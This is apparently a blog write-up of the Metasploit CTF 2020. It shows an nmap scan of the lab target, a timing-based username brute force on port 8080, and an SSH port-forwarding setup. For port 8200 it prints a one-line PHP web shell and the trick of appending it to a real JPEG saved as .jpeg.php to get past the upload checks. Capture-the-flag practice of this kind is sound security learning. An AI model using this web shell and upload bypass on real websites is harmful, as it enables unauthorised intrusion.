MetasploitCTF 2020 – Writeups

Recently I’ve been looking into Metasploit and HackTheBox (soon I will publish some write-ups of the boxes I’ve owned) and I was getting some experience in pentesting machines. So I’ve came across this CTF a few days before it started, while looking for something else related to Metasploit and I’ve decided to try it.

I was a bit disappointed because I was expecting more stuff similar to HackTheBox, so that I could practice more with Metasploit, instead felt more similar to past CTFs I took part of, with a mixture of challenges that were similar to real life situations, and simple puzzles (I’m looking at you, Buffalo challenge, port 4545 which apparently someone solved by simply inputting the word buffalo for 200 times).

The way this CTF was structured: you had access to 2 machines, one with Kali -to which you had to connect to with provided ssh keys- and the target machine, reachable through the Kali machines. So the options (at least the ones I thought of) where two:

  • Connecting to the Kali machine, and then do everything from there, from the command line
  • Funnel through SSH and then do everything with my local machine

I’ve opted for the second option, I was more comfortable in using my own version of kali with Burp and other software and scripts I’m used to use, but for some tests I’ve also used the provided Kali machine (e.g. I had several connectivity issue with my home internet, so I uploaded on the remote kali machine a brute force script and run it from there, leaving it all the night attempting passwords).

The target machine had a number of ports open, each one with a different challenge, so it was a matter to connect to a specific port and solve the challenge and get the flag. In this challenge the “flag” was the MD5 of pictures found on the target machines, with the names of poker cards. So you find the picture, then through some script like md5sum you find the MD5 of that picture and put it in the challenge section of the MetasploitCTF dashboard.

I’ve engaged with a core number of challenges, making progresses on some of them, and in the end I’ve found 2 flags (without considering the 3rd one, that was simply a welcome flag found on the port 80 of the target machine).

Here’s the writeup of the two challenges.

metasploit ctf scoreboard

Scanning and enumeration

This was the NMap report with a list of all the open ports and challenges:

kali@kali:~$ nmap -T4 -A -p- 172.15.5.21
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-04 15:16 UTC
Nmap scan report for 172.15.5.21
Host is up (0.0092s latency).
Not shown: 65515 closed ports                                                                                                                                                                     
PORT     STATE SERVICE     VERSION                                                         
80/tcp   open  http        nginx 1.19.5                                                     
|_http-server-header: nginx/1.19.5                                                         
|_http-title: Metasploit CTF
1080/tcp open  socks5      (No authentication; connection failed)
| socks-auth-info: 
|_  No authentication
1337/tcp open  waste?
| fingerprint-strings: 
|   GenericLines, GetRequest, HTTPOptions, RTSPRequest: 
|     Welcome to the '9 of Clubs' service.
|     -------------------------------
|     Please choose an option:
|     Send contact info
|     Greetings
|     Send feedback
|     Exit
|     Unknown option.
|     Welcome to the '9 of Clubs' service.
|     -------------------------------
|     Please choose an option:
|     Send contact info
|     Greetings
|     Send feedback
|     Exit
|   NULL: 
|     Welcome to the '9 of Clubs' service.
|     -------------------------------
|     Please choose an option:
|     Send contact info
|     Greetings
|     Send feedback
|_    Exit
4545/tcp open  http        SimpleHTTPServer 0.6 (Python 3.8.5)
|_http-server-header: SimpleHTTP/0.6 Python/3.8.5
|_http-title: Directory listing for /
5555/tcp open  telnet
| fingerprint-strings: 
|   NULL: 
|     [HSCORE: 0
|     [HSCORE: 1
|     [HSCORE: 2
|     [HSCORE: 3
|_    [HSCORE: 4
6868/tcp open  http        WSGIServer 0.2 (Python 3.8.5)
|_http-server-header: WSGIServer/0.2 CPython/3.8.5
|_http-title: Photos5u
8080/tcp open  http        Apache httpd 2.4.38 ((Debian))
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
8092/tcp open  http        Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
8101/tcp open  http        Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: 5 of Clubs Frontend
8123/tcp open  http        WSGIServer 0.2 (Python 3.8.5)
|_http-server-header: WSGIServer/0.2 CPython/3.8.5
|_http-title: Salt Free Hashes
8200/tcp open  http        Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Home
8201/tcp open  http        nginx 1.19.5
|_http-server-header: nginx/1.19.5
|_http-title: Did not follow redirect to http://intranet.metasploit.ctf:8201
8202/tcp open  http        nginx 1.19.5
|_http-server-header: nginx/1.19.5
|_http-title: Site doesn't have a title (text/html).
8888/tcp open  http        Werkzeug httpd 1.0.1 (Python 3.8.5)
|_http-title: Home
9000/tcp open  http        WEBrick httpd 1.6.0 (Ruby 2.7.0 (2019-12-25))
|_http-server-header: WEBrick/1.6.0 (Ruby/2.7.0/2019-12-25)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
9001/tcp open  http        Thin httpd
|_http-server-header: thin
|_http-title: CtfChallenge
9007/tcp open  http        Apache httpd 2.4.46 ((Unix))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (Unix)
|_http-title: Index of /
9008/tcp open  java-object Java Object Serialization
9009/tcp open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4c:0f:d8:c5:a2:f1:54:f9:92:30:df:62:1f:52:e6:fe (RSA)
|   256 6e:b8:6f:94:e6:c0:2f:15:0c:80:71:32:cb:d0:2a:00 (ECDSA)
|_  256 8a:55:03:98:8e:87:29:50:66:1a:57:4c:5b:10:a4:01 (ED25519)
9010/tcp open  http        Apache httpd 2.4.38
| http-ls: Volume /
| SIZE  TIME              FILENAME
| 3.2K  2020-12-01 15:29  QOH_Client.jar
|_
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Index of /

 

Looks like there were a number of different services running on this Ubuntu 18.04 machine, like nginx/1.19.5, Apache/2.4.38 , Werkzeug httpd 1.0.1, WEBrick httpd 1.6.0, WSGIServer 0.2, and other stuff that you would see enumerating and investigating every single port/challenge.

Port 8080

 

metasploit ctf 8080

This challenge on the port 8080 was about finding the other username that was valid, other than ‘guest’. When trying manually ‘guest’ and another couple of common ones like ‘admin’ for example. You would try to login with some random credentials and then a new page with a message woud load, telling if the credentials used were of a valid or not.

 

I noticed that the loading time of the ‘guest’ attempt was much longer than the others. So I thought that this challenge could be resolved by bruteforcing a number of different usernames and then check which ones had a response time similar to ‘guest’. I usually use Burp Suite, but it’s the Community Edition, so has it slows down bruteforcing actions. I’ve then decided to use OWASP ZAP, that’s a perfectly fine alternative to Burp Suite (maybe even better in some respects), which has no such limitations.

I’ve first tried the xato-net-10-million-passwords-1000.txt with 10k passwords but didn’t find anything, as well as using the famous rockyou list. So I’ve decided to use the full 10 Millions xato password list and I found another username that had a response time longer than others: ‘demo’.

I submitted my answer on the site and boom: flag found.

metasploitctf flag card

Port 8200

metasploit 8200 home pageThis port had a simple website behind it, with a Gallery of images (on the View page) and a page to Upload the pictures.

So the first thing I thought of was to try uploading a shell instead of a picture. So I loaded Burp Suite, setup the proxy to intercept the requests and tried to upload a shell.php by renaming it to .jpg.

After a few attempts it was clear that the uploader checked two things:

  • The extension of the file
  • The MIME type

What I did then was to create a file harpocrates.php with this code inside: `<?=`$_GET[harpo]`?>` then append it to a real image I’ve downloaded, using the Kali command line:

cat hackerman.jpeg harp.php > harpocrates.jpeg.php

 

This step was necessary to bypass the mime type check. I originally tried to simply add the prefix of a jpg file signature to the simple shell code by forging the request on Burp, but for some reason it didn’t work so I resorted to just use a real image and append at the bottom the shell code.
And I had to rename the file to .jpeg.php to make it pass the file extension check.

At that point I simply had to go to <URL_of_file>/harpocrates.jpeg.php?harpo= and I could run all the commands I needed, like ls -la to see the content of the folder, whoami to see the user, etc.

web shell command code

I’ll be honest, I spent on this challenge much more time than needed, because I wasn’t root and I was coming after a week of HTB challenges, so I spent some time trying to find a way to become root, upload a meterpreter shell, other exploits, etc. For example I even tried to upload a better shell, p0wny.

p0ny powny shell

In the end, the solution was much more simple. A couple of folders up, there was an hidden folder with the flag, so I simply visited that URL.

solution metasploit ctf

The above image also shows an interesting fact: when running commands, you would see the response either by checking the “response” tab on Burp, or by opening the page with the view source code option, which made the responses much more clear. If you noticed the previous image, the result of the ls -la command is not as readable as the one in the above image, on the left.

So, I went to that URL, grabbed the image and submitted its MD5. Challenge completed.

solution metasploit ctf 2020

 

Funnelling through SSH

When looking at Discord/Slack, some people were asking how to connect to the target, as they weren’t used to the type of setup we had in this CTF so I thought to provide an explanation on how I did it, in case anyone may find it useful for future situations.

Every team had .pem file, and then the two machines to use for the CTF, a Kali machine (to use as an entry point and/or the attacking machine) and a Target connected to the Kali machine.

So I decided to use an SSH Funnel, opening specific port on my localhost so that I could connect to the target directly from my host browser, funnelling the traffic through the Kali machine. To do that I’ve used this command:

ssh -L <local_port>:<target_machine_IP>:<target_port> <username>:<kali_machine_IP> -i <pem file> -M

so I would choose a random local port, and then (using the above 8802 port challenge, and my assigned Kali’s and Target machine’s IPs, as well as pem key), the command would look like this:

ssh -L 8880:172.15.5.21:8802 kali@54.172.94.85 -i metasploit_ctf_kali_ssh_key.pem -M

After lunching that command in the terminal, I simply had to open my browser and visit localhost:8880 to see the website of the challenge located on the target machine at the port 8802. Of course, there was an http service listening on that port, that’s why I was using my browser to visit it. In the case of other services, you would need to use a different software/service.